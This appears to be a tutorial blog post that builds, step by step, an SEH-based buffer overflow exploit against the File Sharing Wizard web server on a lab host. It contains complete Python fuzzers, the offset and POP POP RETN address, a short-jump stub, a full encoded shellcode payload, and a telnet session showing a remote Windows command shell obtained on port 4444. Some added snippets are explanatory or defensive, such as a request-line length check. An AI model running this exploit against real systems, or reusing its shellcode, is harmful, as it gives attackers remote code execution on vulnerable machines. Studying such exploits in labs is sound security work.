SEH Based Buffer Overflow

This time I will write about a buffer overflow in the File Sharing Wizard application; this is the first time I have learned about buffer overflows. We get a buffer overflow when we send that application 2000 bytes of data. This is the sample fuzzer, in Python 2:

import socket
import sys

ips = '192.168.56.101'   # target host
port = 80                # File Sharing Wizard HTTP port
string = "A" * 2000      # 2000 bytes of filler

print "[!] Launching Remote BoF on", ips, ",hang on tight!"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((ips, port))
except:
    print "[-] Oops! Cannot establish connection..\r\n"
    sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
# the filler becomes the request-target of a HEAD request
payload = (
    'HEAD %s HTTP/1.0\r\n'
    '\r\n') % (string)
s.send(payload)
s.close()
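The trigger above is nothing more than a HEAD request whose request-target is 2000 bytes long. As an added example (not code from the original post), here is a small Python 3 check of the kind a reverse proxy or log parser could apply to incoming request lines, run on constructed requests: a normal one, one shaped like the fuzzer, and one carrying a control byte. The limits MAX_TARGET_LEN and MAX_RUN are illustrative assumptions, not a standard.

```python
import re

# Constructed sample requests (not captured traffic).  "oversized" has the
# shape of the fuzzer above: a HEAD request whose target is 2000 bytes of "A".
SAMPLES = {
    "normal":       b"HEAD /index.html HTTP/1.0\r\n\r\n",
    "oversized":    b"HEAD " + b"A" * 2000 + b" HTTP/1.0\r\n\r\n",
    "control_byte": b"HEAD /a\x01b HTTP/1.0\r\n\r\n",
}

# Assumed limits for this check (illustrative, not a standard): a sane
# request-target length and the longest run of one repeated byte that a
# real URL is likely to contain.
MAX_TARGET_LEN = 1024
MAX_RUN = 64

REQUEST_LINE = re.compile(rb"^([A-Z]+) (\S+) HTTP/(\d\.\d)\r\n")


def longest_run(data: bytes) -> int:
    """Length of the longest run of one repeated byte value in data."""
    best = cur = 0
    prev = None
    for b in data:
        cur = cur + 1 if b == prev else 1
        prev = b
        best = max(best, cur)
    return best


def inspect_request(raw: bytes) -> dict:
    """Parse the request line and return a verdict with the reasons, if any."""
    m = REQUEST_LINE.match(raw)
    if not m:
        return {"ok": False, "method": None, "target_len": 0,
                "reasons": ["unparseable request line"]}
    method, target = m.group(1).decode("ascii"), m.group(2)
    reasons = []
    if len(target) > MAX_TARGET_LEN:
        reasons.append("request-target length %d exceeds %d"
                       % (len(target), MAX_TARGET_LEN))
    run = longest_run(target)
    if run > MAX_RUN:
        reasons.append("repeated-byte run of %d in request-target" % run)
    if any(b < 0x21 or b > 0x7E for b in target):
        reasons.append("non-printable bytes in request-target")
    return {"ok": not reasons, "method": method, "target_len": len(target),
            "reasons": reasons}


if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        verdict = inspect_request(raw)
        print("%-12s ok=%-5s target_len=%-4d %s" % (
            name, verdict["ok"], verdict["target_len"],
            "; ".join(verdict["reasons"])))
```

The repeated-byte check is what separates a fuzzing or exploit attempt from a merely long legitimate URL: a filler of identical bytes, or a cyclic pattern, has a run structure that real request-targets do not.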

With that fuzzer the application crashes, but EIP is not overwritten directly, because the crash is caught by the application's structured exception handling (SEH) and our data has landed on the SEH chain; we can see this in the debugger's SEH chain view.

After we know that, we need to find out at which byte the SEH record is overwritten. We can use pattern_create.rb to create a 2000-character pattern; pattern_create.rb can be found in the Metasploit tools folder:

root@bt:/pentest/exploits/framework/tools# ruby pattern_create.rb 2000
That command generates a 2000-character pattern that we use in the fuzzer in place of the A's, like this:

import socket
import sys

ips = '192.168.56.101'
port = 80
# output of pattern_create.rb 2000, split per leading letter for readability
string = ("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9"
          "Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9"
          "Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co")

print "[!] Launching Remote BoF on", ips, ",hang on tight!"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((ips, port))
except:
    print "[-] Oops! Cannot establish connection..\r\n"
    sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
    'HEAD %s HTTP/1.0\r\n'
    '\r\n') % (string)
s.send(payload)
s.close()

Execute that fuzzer and the debugger shows the SEH handler overwritten with 42386942. To find at which byte that value sits we use pattern_offset.rb:
root@bt:/pentest/exploits/framework/tools# ruby pattern_offset.rb 42386942
1044
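pattern_create.rb and pattern_offset.rb are a cyclic pattern generator and a lookup: the pattern is every combination of an upper-case letter, a lower-case letter and a digit, so any four consecutive bytes occur at only one position. The following Python 3 code is an added example, not the Metasploit tools themselves. It reproduces the two results above (a 2000-byte pattern ending in Co4Co5Co, and offset 1044 for the value 42386942 read little-endian out of the debugger) and also shows the little-endian packing that is applied when an address is later placed into the buffer.

```python
import struct

UPPER = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
LOWER = "abcdefghijklmnopqrstuvwxyz"
DIGIT = "0123456789"
MAX_LEN = len(UPPER) * len(LOWER) * len(DIGIT) * 3   # 20280 chars before it would repeat


def pattern_create(length):
    """Cyclic pattern Aa0Aa1...Az9Ba0...: one upper-case letter, one lower-case
    letter and one digit per triplet, truncated to `length` characters.  This is
    the scheme pattern_create.rb uses for its first 20280 characters."""
    if length > MAX_LEN:
        raise ValueError("pattern would repeat beyond %d characters" % MAX_LEN)
    triplets = (u + l + d for u in UPPER for l in LOWER for d in DIGIT)
    return "".join(triplets)[:length]


def pattern_offset(value, length=2000):
    """Offset in the pattern of the four bytes that, read as a little-endian
    DWORD (the way the debugger displays the overwritten handler), equal `value`.
    Returns -1 if they do not occur in the pattern."""
    needle = struct.pack("<I", value).decode("latin-1")
    return pattern_create(length).find(needle)


def le32(address):
    """Pack a 32-bit address in little-endian order, the byte order in which an
    x86 CPU stores it in memory and therefore the order it takes in the buffer."""
    return struct.pack("<I", address)


if __name__ == "__main__":
    pat = pattern_create(2000)
    print(pat[-8:])                       # Co4Co5Co, the tail seen in the fuzzer above
    print(pattern_offset(0x42386942))     # 1044, matching pattern_offset.rb
    print(le32(0x74D31567).hex())         # 6715d374, the byte order used for the address
```

Because the 2000-character pattern never repeats a four-byte window, a single run of the fuzzer is enough to locate the overwritten field, which is why the value 42386942 (the bytes "Bi8B") maps to exactly one offset.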

Now we must look for a POP POP RETN sequence to take control of EIP through the overwritten SEH record. It has to come from an executable module, and only modules that are not protected with SafeSEH can be used; we can check this with msfpescan. For this application I use the module libeay32.dll, and this is the POP POP RETN in that module:

That sequence is at address 74D31567. Now we put that address into our fuzzer at byte 1044, in little-endian byte order, to overwrite the SEH handler. This is our fuzzer after the modification:

import socket
import sys

ips = '192.168.56.101'
port = 80
string = "\x41" * 1000                  # filler up to byte 1000
string += "\xCC" * 44                   # int3 breakpoints up to byte 1044
string += "\x67\x15\xD3\x74"            # 0x74D31567 (POP POP RETN in libeay32.dll), little-endian
string += "\x41" * (2000-len(string))   # pad the buffer to 2000 bytes

print "[!] Launching Remote BoF on", ips, ",hang on tight!"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((ips, port))
except:
    print "[-] Oops! Cannot establish connection..\r\n"
    sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
    'HEAD %s HTTP/1.0\r\n'
    '\r\n') % (string)
s.send(payload)
s.close()

Wow... after the POP POP RETN executes, we land in the run of \xCC bytes in the four rows just before our address in the packet. We must jump over the fifth row, which holds the POP POP RETN address. This is the fuzzer after the modification:

import socket
import sys

ips = '192.168.56.101'
port = 80
string = "\x41" * 1000
string += "\xCC" * 40
string += "\xeb\x06\x90\x90"            # jmp short +6 over the handler address, then two nops
string += "\x67\x15\xD3\x74"            # POP POP RETN address, little-endian
string += "\x41" * (2000-len(string))

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((ips, port))
except:
    print "[-] Oops! Cannot establish connection..\r\n"
    sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
    'HEAD %s HTTP/1.0\r\n'
    '\r\n') % (string)
s.send(payload)
s.close()
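To see why the displacement is 6, the following Python 3 code (added here, not from the original post) rebuilds the byte layout of the fuzzer above as constructed data, reports where each region starts, and decodes the EB 06 short jump the way the CPU does: the signed rel8 displacement is added to the address of the instruction that follows it, so from offset 1040 it skips the two nops and the 4-byte handler address and lands at offset 1048, the first byte after the handler. The field names nseh, handler and after_handler are my own labels for the regions.

```python
import struct

# Constructed copy of the byte layout of the fuzzer above.
FILLER  = b"\x41" * 1000
INT3    = b"\xCC" * 40
NSEH    = b"\xeb\x06\x90\x90"              # jmp short +6, then two nops
HANDLER = struct.pack("<I", 0x74D31567)    # POP POP RETN address from the post, little-endian
TOTAL   = 2000


def build_layout():
    """Return the 2000-byte buffer and the offset at which each region begins."""
    buf = FILLER + INT3 + NSEH + HANDLER
    offsets = {
        "nseh":          len(FILLER) + len(INT3),     # where execution lands after POP POP RETN
        "handler":       len(FILLER) + len(INT3) + len(NSEH),
        "after_handler": len(buf),                    # first byte past the handler address
    }
    buf += b"\x41" * (TOTAL - len(buf))
    return buf, offsets


def decode_short_jmp(code, at):
    """Decode a two-byte `jmp rel8` (opcode EB) at offset `at` and return the
    offset it transfers control to.  The 8-bit displacement is signed and is
    relative to the end of the instruction, i.e. to offset at + 2."""
    if code[at] != 0xEB:
        raise ValueError("no short jmp at offset %d" % at)
    rel8 = struct.unpack("<b", code[at + 1:at + 2])[0]
    return at + 2 + rel8


def jump_lands_after_handler():
    """True if the jmp in the next-SEH slot skips the handler address exactly."""
    buf, off = build_layout()
    return decode_short_jmp(buf, off["nseh"]) == off["after_handler"]


if __name__ == "__main__":
    buf, off = build_layout()
    print(off)                                  # nseh 1040, handler 1044, after_handler 1048
    print(decode_short_jmp(buf, off["nseh"]))   # 1048
    print(jump_lands_after_handler())           # True
```

Counting from zero, the jump sits at bytes 1040-1043 and the handler address at 1044-1047, which is the arithmetic the prose below describes with one-based numbers.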

I put "\xeb\x06\x90\x90" at bytes 1040-1044 to jump 6 bytes forward from that location, because bytes 1045-1048 contain the POP POP RETN address. Now we set the payload in the bytes after 1044, which so far contain the string A (0x41 in hex):

import socket
import sys

ips = '192.168.56.101'
port = 80
string = "\x41" * 1000
string += "\xCC" * 40
string += "\xeb\x06\x90\x90"            # jmp short +6 over the handler address, then two nops
string += "\x67\x15\xD3\x74"            # POP POP RETN address, little-endian
# the shellcode follows; the session below connects to it on port 4444

string+=("\xda\xc7\x31\xc9\xb1\x51\xd9\x74\x24\xf4\xbf\x69\xf7\x14\xfe\x5a"
"\x31\x7a\x17\x03\x7a\x17\x83\x83\x0b\xf6\x0b\xaf\x9e\x1c\xbe\xa7"
"\xa6\x1c\xbe\xc8\x39\x68\x2d\x12\x9e\xe5\xeb\x66\x55\x85\xf6\xee"
"\x68\x99\x72\x41\x73\xee\xda\x7d\x82\x1b\xad\xf6\xb0\x50\x2f\xe6"
"\x88\xa6\xa9\x5a\x6e\xe6\xbe\xa5\xae\x2d\x33\xa8\xf2\x59\xb8\x91"
"\xa6\xb9\x69\x90\xa3\x49\x36\x7e\x2d\xa5\xaf\xf5\x21\x72\xbb\x56"
"\x26\x85\x50\x6b\x7a\x0e\x2f\x07\xa6\x0c\x51\x14\x97\xf7\xf5\x11"
"\x9b\x37\x7d\x65\x10\xb3\xf1\x79\x85\x48\xb1\x89\x8b\x26\xbc\xc7"
"\x3d\x5b\x90\x28\x97\xc5\x42\xb0\x70\x39\x57\x54\xf6\x4e\xa5\xfb"
"\xac\x4f\x19\x6b\x86\x5d\x66\x50\x48\x61\x41\xf9\xe1\x78\x08\x84"
"\x1f\x8a\xd7\xd3\xb5\x89\x28\x0b\x21\x57\xdf\x5e\x1f\x30\x1f\x76"
"\x33\xec\x8c\x25\xe7\x51\x60\x8a\x54\xa9\x56\x6a\x33\x44\x0b\x14"
"\x90\xef\x52\x4d\x7e\x54\x8e\x1d\xb8\xc3\x50\x0b\x2c\xfc\xff\xe6"
"\x4e\x2c\x97\xac\x1c\xe3\x81\xfb\xa1\x2a\x02\x56\xa1\x03\xcd\xbd"
"\x14\x22\x47\x6a\x58\xfc\x08\xc0\xf2\x54\x56\x38\x69\x3e\x4f\xc1"
"\x48\xc6\xd8\xce\x83\x6c\x18\xe0\x4a\xe5\x82\x66\xfb\x9a\x27\xef"
"\x1e\x36\xe8\xb6\xc9\x0b\x81\xaf\x60\xd0\x1b\xcd\x44\x18\xe8\xbb"
"\x59\xda\x22\x45\xe7\xf7\xaf\x34\x92\x3f\x7b\xed\xc8\x28\x09\x0f"
"\xbd\xbf\x12\x9a\x86\x40\x3a\x3f\x50\xed\x92\xee\x0f\x7b\x14\x41"
"\xe1\x2e\x47\x9e\xd1\xb9\xca\xb9\xd7\xf7\x46\xc6\x0e\x6d\x96\xc7"
"\x98\x8d\xb8\xbc\xb0\x8d\xba\x06\x5a\x91\x6b\xd4\x5c\xbd\xfc\xa6"
"\x7a\xdc\x8e\x05\x84\xf7\x8e\x79")

print "[!] Launching Remote BoF on", ips, ",hang on tight!"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    connect = s.connect((ips, port))
except:
    print "[-] Oops! Cannot establish connection..\r\n"
    sys.exit(1)
print "[*] Sending evil payload..\r\n"
print "[*] Done! Check your debugger.."
payload = (
    'HEAD %s HTTP/1.0\r\n'
    '\r\n') % (string)
s.send(payload)
s.close()

After the fuzzer runs, the application does not crash, and the exploit is still running:

root@bt:~/Desktop/tes# python fswizard-skeleton.py
[!] Launching Remote BoF on 192.168.56.101 ,hang on tight!
[*] Sending evil payload..

[*] Done! Check your debugger..
root@bt:~/Desktop/tes# telnet 192.168.56.101 4444
Trying 192.168.56.101...
Connected to 192.168.56.101.
Escape character is '^]'.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\victim>
